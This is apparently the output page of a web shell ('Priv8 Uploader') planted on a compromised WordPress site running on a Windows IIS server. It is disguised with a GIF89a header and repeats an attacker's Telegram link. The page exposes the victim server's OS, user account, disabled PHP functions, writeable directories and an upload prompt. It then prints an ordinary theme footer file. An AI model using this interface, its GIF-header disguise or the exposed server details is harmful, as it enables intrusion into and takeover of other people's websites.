GIF89a;

Priv8 Uploader By InMyMine7

Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
GIF89a;

Priv8 Uploader By InMyMine7

Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
GIF89a;

Priv8 Uploader By InMyMine7

Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
GIF89a;

Priv8 Uploader By InMyMine7

Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
.
https://t.me/RX1948
Server : Microsoft-IIS/10.0
System : Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
User : hm77079 ( 0)
PHP Version : 7.3.6
Disable Function : passthru,exec,system,popen,chroot,chgrp,chown,escapesh,ellcmd,escapeshellarg
Directory :  D:/www/hm77079/wwwroot/wp-content/themes/Blog-theme_3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : D:/www/hm77079/wwwroot/wp-content/themes/Blog-theme_3/footer-2.php
<footer id="colophon" class="site-footer clear"><div class="clear"></div><div id="site-bottom" class="container clear"><div class="site-info">Copyright © 2012-2021  <a href="<?php echo get_option('home'); ?>"><?php bloginfo('name'); ?></a> - 主题巴巴原创 WordPress主题</div></div></footer></div> 

<script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?adffbbfa4c220a656094574941c145dc";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();</script><script data-noptimize="1">window.lazySizesConfig=window.lazySizesConfig||{};window.lazySizesConfig.loadMode=1;</script><script async="" data-noptimize="1" src="<?php bloginfo('template_directory'); ?>/images-2/
lazysizes.js"></script> 

<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/images-2/
autoptimize_single_5ee990907b315027da600eeeaee2e04b.js" id="html5-js"></script> <div id="wsocial-dialog-login" style="display:none;position: fixed;z-index: 999;"><div class="xh-cover"></div></div> 
   	
   	<script type="text/javascript">(function($){
    	$('#wsocial-dialog-login .xh-close,#wsocial-dialog-login .xh-cover').click(function(){
    		window.__wsocial_enable_entrl_submit=false;
    		$('#wsocial-dialog-login').hide();
    	});
    	window.wsocial_dialog_login_show=function(){
        	$('#wsocial-dialog-login').css('display','block');
    	    window.__wsocial_enable_entrl_submit=true;
			window.__modal_wsocial_login_resize();
			return false;
        };
        $(function(){
			$('.btn-wsocial-login').click(function(event){
				event.stopPropagation(); 
				window.wsocial_dialog_login_show();
				return false;
			});
        });
        window.__modal_wsocial_login_resize=function(){
			var $ul =$('#wsocial-dialog-login');
			var width = window.innerWidth,height = window.innerHeight;
			if (typeof width != 'number') { 
			    if (document.compatMode == 'CSS1Compat') {
			        width = document.documentElement.clientWidth;
			        height = document.documentElement.clientHeight;
			    } else {
			        width = document.body.clientWidth;
			        height = document.body.clientHeight; 
			    }
			}
			$ul.css({
				top:((height - $ul.height()) / 2) + "px",
				left:((width - $ul.width()) / 2) + "px"
			});
		};
    	$(window).resize(function(){
    		window.__modal_wsocial_login_resize();
    	});
    })(jQuery);</script> <script>// Get the modal
	var modal = document.getElementById('myModal');

	// Get the button that opens the modal
	var btn = document.getElementById("myBtn");

	// Get the <span> element that closes the modal
	var span = document.getElementsByClassName("close")[0];

	// When the user clicks the button, open the modal 
	btn.onclick = function() {
	    modal.style.display = "block";
	}

	// When the user clicks on <span> (x), close the modal
	span.onclick = function() {
	    modal.style.display = "none";
	}

	// When the user clicks anywhere outside of the modal, close it
	window.onclick = function(event) {
	    if (event.target == modal) {
	        modal.style.display = "none";
	    }
	}</script> <script>(function($){ //create closure so we can safely use $ as alias for jQuery

    $(document).ready(function(){

        "use strict";
		$(window).load(function() {
			var stickySidebar = new StickySidebar('#secondary', {
				topSpacing: 20,
				bottomSpacing: 20,
				containerSelector: '.site_container',
				innerWrapperSelector: '.sidebar__inner'
			});
		});	

    });


})(jQuery);</script> <script>(function($){ //create closure so we can safely use $ as alias for jQuery

    $(document).ready(function(){

        "use strict";

		if ($(window).width() >= 960) {

			var mn  = $(".home .site-header");
			var mns = "main-nav-scrolled";
			var hdr = $('.top-bar').height();
  
			$(window).scroll(function() {
			  if( $(this).scrollTop() > hdr ) {
			    mn.addClass(mns);
			    $('.home .header-space').css('display','block');
			  } else {
			    mn.removeClass(mns);
			    $('.home .header-space').css('display','none');
			  }
			});	

		}

    });


})(jQuery);</script> <script>(function($){ //create closure so we can safely use $ as alias for jQuery

    $(document).ready(function(){

        "use strict";

		$('.content-block .owl-carousel').owlCarousel({
			autoplay: true,
			autoplayHoverPause: true,
		    loop:true,
		    margin:15,
		    dots: false,
		    nav:true,
		    responsiveClass:true,
		    responsive:{
		        0:{
		            items:2,
		            nav:true
		        },
		        600:{
		            items:3,
		            nav:true
		        },
		        1000:{
		            items:5,
		            nav:true,
		            loop:true
		        }
		    }
		})

		$('.bxslider').owlCarousel({
			autoplay: true,
			autoplayHoverPause: true,
			loop: true,
		    dots: true,
		    nav:true,
		    responsiveClass:true,
			responsive:{
			    0:{
			        items:1
			    },
			    600:{
			        items:1
			    },
			    1000:{
			        items:1
			    }
			}		    		    
		})	
		$('.widget_media_gallery .owl-carousel').owlCarousel({
			autoplay: true,
			autoplayHoverPause: true,
			loop: true,
		    dots: true,
		    nav:true,
		    responsiveClass:true,
			responsive:{
			    0:{
			        items:1
			    },
			    600:{
			        items:1
			    },
			    1000:{
			        items:1
			    }
			}
		})

		$('#primary .entry-content .owl-carousel').owlCarousel({
			autoplay: true,
			autoplayHoverPause: true,
			loop: true,
		    dots: true,
		    nav:true,
		    responsiveClass:true,
			responsive:{
			    0:{
			        items:1
			    },
			    600:{
			        items:1
			    },
			    1000:{
			        items:1
			    }
			}
		})							

    });


})(jQuery);</script>  <script>(function($){
		$(window).on("load",function(){
			
			$(".related-loop").mCustomScrollbar({
				theme:"minimal"
			});
			
		});
	})(jQuery);</script> <script defer="defer" src="<?php bloginfo('template_directory'); ?>/images-2/
autoptimize_d56cbcd41f90a6541a24c0a64caa19ec.js"></script>



</body></html>
<!-- Dynamic page generated in 0.140 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2022-01-12 19:57:52 -->
<!-- Compression = gzip -->

https://t.me/RX1948 - 2025